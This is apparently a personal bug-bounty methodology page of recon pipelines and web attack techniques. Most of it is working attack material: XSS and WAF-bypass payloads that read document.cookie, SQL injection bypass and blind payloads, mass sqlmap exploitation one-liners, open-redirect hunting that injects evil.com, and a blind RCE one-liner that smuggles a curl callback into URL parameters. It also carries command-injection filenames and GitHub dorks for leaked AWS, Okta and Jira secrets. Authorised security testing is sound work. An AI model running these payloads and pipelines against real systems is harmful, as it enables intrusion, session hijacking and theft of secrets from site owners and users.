๐Ÿง‘โ€๐ŸซMy Methodologies

description: For Personal Reference

Gathering Breached Credentials

file upload vulnerability test

Set domain scope (burpsuite)

.*\.target\.com$

XSS recon methodology

โ–ถ cat domains.txt | waybackurls > urls

cat urls.txt        --> read the file
| kxss              --> filter special characters
| sed 's/=.*/=/'    --> remove everything after = ,add = 
| sed 's/URL: //'   --> remove URL: and white space
| dalfox pipe       --> dalfox tool for xss payload
-b xalgord.xss.ht   --> BXSS payload adder.

KXSS

The vulnerable parameter for XSS should have Unfiltered : [โ€œ โ€˜ < > $ | ( ) ` : ; { } ]

Payload:

"><img%20src=x%20onerror="alert(%27POC%20By%20Xalgord%27)"

Bypass Waf Pyaload:

<%2FScriPt><sCripT+class%3DXalgord>document.write(document.cookie);<%2FsCriPt>

Open Redirect Mass Hunt

  • tool = ragno, qsreplace

python3 ragno.py -d intensedebate.com -s -q -o ragno_urls.txt
cat ragno_urls.txt | grep -a -i \=http | wc -w
cat ragno_urls.txt | grep -a -i \=http > potential_openredirect_vun.txt
cat potential_openredirect_vun.txt | qsreplace "http://evil.com" | wc -w
cat potential_openredirect_vun.txt | qsreplace "http://evil.com" > unique_potential_openredirect.txt
cat unique_potential_openredirect.txt | while read target_urls do; do curl -s -L $target_urls -I | grep "evil.com" && echo "[Vulnerable] $target_urls \n"; done

  • Example: One Liner for Hunting Mass Open Redirect

python3 ragno.py -d test.vulnweb.com -s -q -o ragno_urls.txt | cat ragno_urls.txt | grep -a -i \=http | qsreplace "http://evil.com" | while read target_url do; do curl -s -L $target_url -I | grep "evil.com" && echo "[+] [Vulnerable] $target_url \n"; done

Amass Command

amass enum -brute -o output.txt -d example.com -v

Detect Low Hanging Bugs and Sensitive Information like API Keys, Secrets etc. including JS Files and HTML Pages

First run Amass Scan and save its output and then run Sublist3r with bruteforce mode and also save its output in different file. Now open a Website such as https://www.textfixer.com/tools/remove-duplicate-lines.php to remove duplicate subdomains.

Tool: https://github.com/BitTheByte/Eagle

Basic Usage:

python3 main.py -f domains.txt

Advanced Usage:

python3 main.py -f domains.txt -w 10 --db output.db.json

To check API keys if they vulnerable or not, use a tool such as gmapsapiscanner, it is usefull to save the time by automating the process and also if it gets any Vulnerable API, it will generate its POC itself.

Tool: https://github.com/ozguralp/gmapsapiscanner

Usage:

python3 maps_api_scanner_python3.py

SQL Injection Methodologies

*try login with admin admin and send login request to burp

*do an active scan

if show SQL injection with parameter

#POC

copy request in txt

and on sqlmap

sqlmap -r sql.txt --force-ssl --level 5 --risk 3 --dbs -p parameter

and you have a valid SQL INJ ๐Ÿ˜Ž๐Ÿ˜Ž

SQL Injection Auth Bypass:

' || 1=1 # /2

Blind SQL Injection payload:

email=test@gmail.com'XOR(if(now()=sysdate(),sleep(5*1),0))XOR'Z

Reflected XSS On private program

1-

amass enum -passive -norecursive -noalts -d domain .com -o domain.txt

2-

cat domain.txt | httpx -o domainhttpx.txt

3-

cat domainhttpx.txt | nuclei -t /home/xalgord/nuclei-templates

DONE ๐Ÿ˜Ž

Find SQL injections (command combo)

subfinder -d target.com | tee -a domains
cat domains | httpx | tee -a urls.alive
cat urls.alive | waybackurls | tee -a urls.check
gf sqli urls.check >> urls.sqli
sqlmap -m urls.sqli --dbs --batch

Hereโ€™s whatโ€™s going on in detail:

  1. First we will find all subdomains under our target domain.

  2. Next we will identify all alive web servers running on those subdomains.

  3. Waybackurls will fetch all URLs that the Wayback Machine knows about the identified alive subdomains.

  4. Now we will filter out URLs that match patterns with potential SQL injection.

  5. The final step is to run sqlmap on all identified potentially vulnerable URLs and let it do its magic.

Protip: If you need to bypass WAF (Web Application Firewall) in the process, add the following options to sqlmap:

--level=5 --risk=3 -p 'item1' --tamper=apostrophemask,apostrophenullencode,appendnullbyte,base64encode,between,bluecoat,chardoubleencode,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,ifnull2ifisnull,modsecurityversioned

Get scope of Bugcrowd programs in CLI

There is a new tool in town called bcscope which can get you the scope of all bug bounty programs available on Bugcrowd platform, including the private ones.

All you have to do is to provide your Bugcrowd token like this:

bcscope -t <YOUR-TOKEN-HERE> -c 2 -p

Quite convenient and pretty useful!

Get the tool here:

  • https://github.com/sw33tLie/bcscope

Chaining file uploads with other vulns

When testing file upload functionalities in a web application, try setting the filename to the following values:

  • ../../../tmp/lol.png โ€”> for path traversal

  • sleep(10)-- -.jpg โ€”> for SQL injection

  • .jpg/png โ€”> for XSS

  • ; sleep 10; โ€”> for command injections

With these payloads, we may trigger additional vulnerabilities.

GitHub dorks for AWS, Jira, Okta .. secrets

Here are some useful GitHub dorks shared by @hunter0x7 for identifying sensitive information related to Amazon AWS cloud:

org:Target "bucket_name"
org:Target "aws_access_key"
org:Target "aws_secret_key"
org:Target "S3_BUCKET"
org:Target "S3_ACCESS_KEY_ID"
org:Target "S3_SECRET_ACCESS_KEY"
org:Target "S3_ENDPOINT"
org:Target "AWS_ACCESS_KEY_ID"
org:Target "list_aws_accounts"

Hereโ€™s another list of GitHub dorks shared by @GodfatherOrwa for identifying various other credentials and secrets:

"target.com" password or secret
"target.atlassian" password
"target.okta" password
"corp.target" password
"jira.target" password
"target.onelogin" password
target.service-now password
some time only "target"

Protip: While you are doing GitHub dorking, try also GitDorker (made by @obheda12) which automates the whole process and which contains 400+ dorks in total, for easy bug bounty wins.

Detailed information about GitDorker can be found here.

Also check related tip BBT5-8.

Simple reflected XSS scenario

Hereโ€™s an interesting bug bounty write-up leading to a reflected XSS (Cross-Site Scripting by visiting a link).

The author was able to successfully identify and exploit XSS despite the fact that the application was filtering some characters and keywords (possibly protected by WAF).

Hereโ€™s what @_justYnot did in detail:

  1. Run subfinder -d target.com | httprobe -c 100 > target.txt

  2. Run cat target.txt | waybackurls | gf xss | kxss

  3. Got a URL which had all the special characters unfiltered and the parameter was callback=

  4. Tried some basic XSS payloads but they werenโ€™t working, the site was filtering some keywords in the payload (like script and alert)

  5. Then he referred to the @PortSwigger XSS cheat sheet (link)

  6. After trying some payloads, one payload with event as onbegin worked and XSS executed successfully!

  7. Made a good report, sent it to the company last month and got rewarded $$

This is a perfect example why we should never give up when things get difficult. When youโ€™ve got a lead, you have to keep pushing to get the reward! Hereโ€™s list of tools @_justYnot used:

  • https://github.com/projectdiscovery/subfinder

  • https://github.com/tomnomnom/httprobe

  • https://github.com/tomnomnom/waybackurls

  • https://github.com/tomnomnom/gf

  • https://github.com/1ndianl33t/Gf-Patterns (xss pattern)

  • https://github.com/tomnomnom/hacks/tree/master/kxss

XSS firewall bypass techniques

Hereโ€™s a list of 7 useful techniques on how we can bypass WAF (Web Application Firewall) while exploiting XSS (Cross-Site Scripting) in a web application:

  1. Check if the firewall is blocking only lowercase:

<sCRipT>alert(1)</sCRiPt>

  1. Try to break firewall regex with new line (\r\n), aka. CRLF injection:

<script>%0d%0aalert(1)</script>

  1. Try double encoding:

%2522

  1. Testing for recursive filters, if firewall removes the text in bold, we will have clear payload:

<scr<script>ipt>alert(1);</scr</script>ipt>

  1. Injecting anchor tag without whitespaces:

<a/href="j&Tab;a&Tab;v&Tab;asc&Tab;ri&Tab;pt:alert&lpar;1&rpar;">

  1. Try to bypass whitespaces using a bullet:

<svgโ€ขonload=alert(1)>

  1. Try to change request method (POST instead of GET):

GET /?q=xss POST /q=xss

  1. Try capatalizing alert function:

</textarea><img src=x onerror=โ€var pop=โ€™ALERT(document.cookie);โ€™; eval(pop.toLowerCase());โ€

Short XSS Payload:

<script/src=//วŠ.โ‚จ></script>

Hex XSS Payloads:

</title><scRipt>alert(0x00C57D)</scRipt>
<iMg src%3dN onerror%3dalert(0x0036A9)>
<iMg src%3dN onerror%3dalert(0x000D98)>

Throw this into EVERY parameter you see

'"`><img src=x>${{7*7}}
'"` =====> SQLi testing
'"` ======> JS inject
'"`> ======> html tag attribute inject
<img src=x> =====> html inject
${{7*7}} ======> CSTI

by @theXSSrat

Nuclei CVE-2023-24488 Citrix XSS - Easy Bug Bounty

Command: subfinder -d target.com -silent | nuclei -t http/cves/2023/CVE-2023-24488.yaml assetfinder target.com | nuclei -t http/cves/2023/CVE-2023-24488.yaml Template: XSS nuclei template CVE-2023-24488.yaml Shodan Dork: ssl:target.com title:"Citrix gateway" Dork: intitle:"Citrix Gateway" -site:citrix.com

Some awesome people on twitter

Find all Subdomains in a Single Shot

cat domains.txt | while read url; do dom=$(assetfinder --subs-only $url|tee $url.txt;crobat -s $url|tee -a $url.txt|subfinder -d $url -silent|tee -a $url.txt |cat $url.txt|httprobe|sort -u > final-$url.txt);echo -e "\e[1;33m[-]Working with $url""\e[1;32m\n  -> done File saved. Please check :)""\n";done

Check all methods on domainlist for Information Disclosure

cat domains.txt | httprobe | while read url;do ww=$(for i in "GET" "PUT" "HEAD" "POST" "TRACE" "CONNECT" "OPTIONS";do curl -s -L -I -X $i $url;done|grep HTTP|grep -v '301 '|awk '{ printf "%3d: %s\n", NR, $0 }');echo -e "\e[1;32m$url\e[0m""\n""$ww""\n";done

Path based xss with different type methods.

  1. Inject payload in every path and check xss

  2. append fake paramters in every path and check xss vulnerability

  3. made poc for you in your terminal

cat domains.txt|gau|egrep -v '(.js|.css|.svg|.jpeg|.jpg)'|grep -v '='|while read url; do dir=$(curl -s -L "$url/xss\"><"|egrep -o '(xss"|xss\\")') dir2=$(curl -s -L "$url/?xss\"><"|egrep -o '(xss"|xss\\")') ;echo -e "Target:\e[1;33m $url\e[0m""\n" "\e[1;32m Method1 -> $dir\e[0m [POC: $url/test\"><]""\n""\e[1;32m  Method2 -> $dir2\e[0m [POC: $url/?test\"><]";done | egrep '(Target|xss)'

Find Blind RCE with automation

cat domains.txt|assetfinder --subs-only|httprobe|gau|grep -Ev (.js|.png|.svg|.jpeg)|grep '='|qsreplace -a ' ||curl //burp-collaborator.burpcollaborator.net'|while read url; do rce=$(curl -s $url);echo -e "[RCE-test] $url";done

If you get Response of your burp collab! Boom RCE

Scan open ports of domain list using masscan

cat domains.txt | httpx -ip -silent| awk '{print $2}' | sed -e 's/\[//g' -e 's/\]//g' | tee ips.txt | while read url; do mass=$(sudo masscan --ports 0-65535 $url);echo -e "$url \n $mass";done

Easy way to find Path based XSS

cat domains.txt | gau | egrep -v '(=|.png|.svg|.jpg|.jpeg|.gif|.js|.js|.css)' | while read url; do dir=$(curl -s -L "$url/xss\"><"|grep 'xss"');echo -e "Target:\e[1;33m $url/\"><\e[0m""\n" "\e[1;32m$dir\e[0m";done

Where to look for Blind XSS

  1. Review Forms

  2. Contact Us pages

  3. Password Field (you never know if the other side doesn't properly handle input and if your password is in view mode)

  4. Address fields of e-commerce sites.

  5. First or last name field while doing credit card payments

  6. Set User-Agent to Blind XSS payload. You can do that easily from a proxy such as Burpsuite. And there are many more cases, but we would encourage you to read some reports to get a perfect knowledge, where other hackers are already applying these techniques and how you can use them in your program

Find Google map API keys in JS files & endpoints from Domains & Subdomains.

cat urls.txt | assetfinder|gau|egrep -v'(.png|.svg|.gif|.jpg|.jpeg|.txt|.ico|.css|\?|.pdf)'|while read url; do map=$(curl -s $url|grep 'AIza');echo -e "$url -> $map";done

Find P1 Bug in a minute

For Checking SSTI Vulnerability..

cat urls.txt |gau -subs|grep '='| egrep -v '(.js|.png|.svg|.gif|.jpg|.jpeg|.txt|.css|.ico)'|qsreplace "ssti{{7*7}}" | while read url;do cur=$(curl -s $url | grep "ssti49"); echo -e "$url -> $cur";done

Output: https://example.com/?s=ssti{{7*7}} -> ssti49 --> Means Vulnerable

Check sqli Vulnerability in One shot of domains & subdomains

cat urls.txt | gau | egrep -v '(.js|.png|.svg|.gif|.jpg|.jpeg|.txt)' | gf sqli|urlive|tee sqli.txt && sqlmap -m sqli.txt --dbs --batch

Find xmlrpc in single shot on domain & subdomains.

cat domains.txt | assetfinder --subs-only | httprobe| while read url; do xml=$(curl -s -L $url/xmlrpc.php|grep 'XML-RPC');echo -e "$url -> $xml";done | grep 'XML-RPC' |sort -u

Output: https://example.com -> XML-RPC server accepts POST requests only

JSFScan.sh usage

bash JSFScan.sh -l targets.txt --all -r -o filname

XSS Normal test input

"><u>Xalgord</u><marquee onstart='prompt(document.cookie)';>XSS</marquee>

Opposite to Keyhacks -> nokeyhacks:

Increase XSS vulnerability impact

Mindmaps for Penetration Testing

NextGoogle Dorks

Last updated